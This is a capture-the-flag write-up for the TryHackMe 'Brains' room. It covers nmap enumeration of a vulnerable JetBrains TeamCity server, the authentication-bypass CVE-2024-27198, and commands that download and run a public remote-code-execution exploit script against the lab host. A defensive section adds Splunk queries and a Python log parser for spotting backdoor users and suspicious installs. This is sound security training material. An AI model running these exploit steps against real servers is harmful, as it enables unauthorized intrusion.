
TryHackMe Brains Writeup

Explore the fundamentals of cybersecurity in the Brains Capture The Flag (CTF) challenge, an easy-level room. This straightforward writeup walks through the key steps clearly and simply, so it stays accessible to players at that level.

Add Hosts

10.10.4.11 brains.thm

Script to add hosts automatically

# Append the host entry only if it is not already present, so re-running is harmless.
ip="10.10.4.11"
domain="brains.thm"
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV brains.thm

Nmap scan report for brains.thm (10.10.4.11)
Host is up (0.068s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 10:6e:04:57:87:92:95:45:7b:ab:41:5a:c0:fa:e2:df (RSA)
|   256 77:f7:0f:b1:b2:69:b6:14:27:41:cc:ad:db:45:34:13 (ECDSA)
|_  256 5f:79:66:d8:2c:c3:8c:e0:38:2a:7a:aa:2a:16:1a:10 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Maintenance
50000/tcp open  http    Apache Tomcat (language: en)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: TeamCity Maintenance — TeamCity
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Login Details

URL: http://brains.thm:50000/login.html

TeamCity version: 2023.11.3 (build 147512)

CVE-2024-27198

CVE-2024-27198 is an authentication bypass in JetBrains TeamCity on-premises builds before 2023.11.4, so the 2023.11.3 build identified above is affected; the fix on a real server is to upgrade.

GitHub Repository for CVE-2024-27198 Exploit

To use the exploit, you can download and run the Python script from the repository:

wget https://raw.githubusercontent.com/W01fh4cker/CVE-2024-27198-RCE/refs/heads/main/CVE-2024-27198-RCE.py
python3 CVE-2024-27198-RCE.py -t "http://brains.thm:50000/"
rm -rf CVE-2024-27198-RCE.py

After running the exploit, check its output and read the flag:

cat /home/ubuntu/flag.txt

Blue Team Defensive Monitoring

After launching the new machine instance, wait approximately 5 minutes to ensure the machine has fully started.

Monitoring Endpoint (Splunk search interface):

  • URL: http://10.10.24.83:8000/en-US/app/search/search

Investigation Queries

  1. Backdoor User Creation: Query the authentication logs to identify any unauthorized user creation events:

     source="/var/log/auth.log" *useradd*

  2. Suspicious Package Installation: Check the package manager logs for any unexpected installations on July 4:

     source="/var/log/dpkg.log" date_month="july" date_mday="4" *install*

  3. Plugin Installation: Review the TeamCity server logs for any new plugin installations:

     source="/opt/teamcity/TeamCity/logs/teamcity-activities.log" *plugin*
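
As an added illustration that is not part of the original writeup or the room, the first two Splunk queries above expressed as plain Python over the raw log files, so the same checks can run on a host that is not forwarding to Splunk. It goes slightly beyond the queries by parsing the useradd fields and by also flagging usermod additions to privileged groups; the log lines, the hostname "brains" and the account and package names are constructed, not captured from the machine.

```python
import re

# Constructed sample lines (not captured from the challenge machine); the
# hostname "brains" and the account/package names are placeholders.
AUTH_LOG = """\
Jul  4 09:58:01 brains sshd[1401]: Accepted password for ubuntu from 10.10.0.5 port 51322 ssh2
Jul  4 10:15:22 brains useradd[1533]: new user: name=eviluser, UID=1001, GID=1001, home=/home/eviluser, shell=/bin/bash, from=none
Jul  4 10:15:40 brains usermod[1540]: add 'eviluser' to group 'sudo'
"""
DPKG_LOG = """\
2024-07-03 08:00:11 install openjdk-11-jre:amd64 <none> 11.0.22+7-0ubuntu2
2024-07-04 10:20:01 install nmap:amd64 <none> 7.80+dfsg1-2build1
2024-07-04 10:20:03 status installed nmap:amd64 7.80+dfsg1-2build1
"""

# Same signal as  source="/var/log/auth.log" *useradd*  but parsed into fields.
USERADD_RE = re.compile(r"useradd\[\d+\]: new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+)")
# Group grants via usermod are the natural follow-up check for a new account.
GROUPADD_RE = re.compile(r"usermod\[\d+\]: add '(?P<name>[^']+)' to (?:shadow )?group '(?P<group>[^']+)'")
# Same signal as  source="/var/log/dpkg.log" ... *install*  keyed on the full ISO date,
# which avoids matching the "status installed" bookkeeping lines.
DPKG_RE = re.compile(r"^(?P<date>\d{4}-\d{2}-\d{2}) \S+ install (?P<pkg>\S+) ")


def backdoor_users(auth_log):
    """Return (username, uid) for every account created via useradd."""
    return [(m["name"], int(m["uid"]))
            for line in auth_log.splitlines() if (m := USERADD_RE.search(line))]


def group_grants(auth_log, groups=("sudo", "admin", "wheel")):
    """Return (username, group) for usermod additions to privileged groups."""
    return [(m["name"], m["group"])
            for line in auth_log.splitlines()
            if (m := GROUPADD_RE.search(line)) and m["group"] in groups]


def installs_on(dpkg_log, day):
    """Return packages whose dpkg 'install' record falls on the given YYYY-MM-DD day."""
    return [m["pkg"] for line in dpkg_log.splitlines()
            if (m := DPKG_RE.match(line)) and m["date"] == day]


if __name__ == "__main__":
    print("new accounts:", backdoor_users(AUTH_LOG))
    print("privileged group grants:", group_grants(AUTH_LOG))
    print("installed on 2024-07-04:", installs_on(DPKG_LOG, "2024-07-04"))
```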
    
This post is licensed under CC BY 4.0 by the author.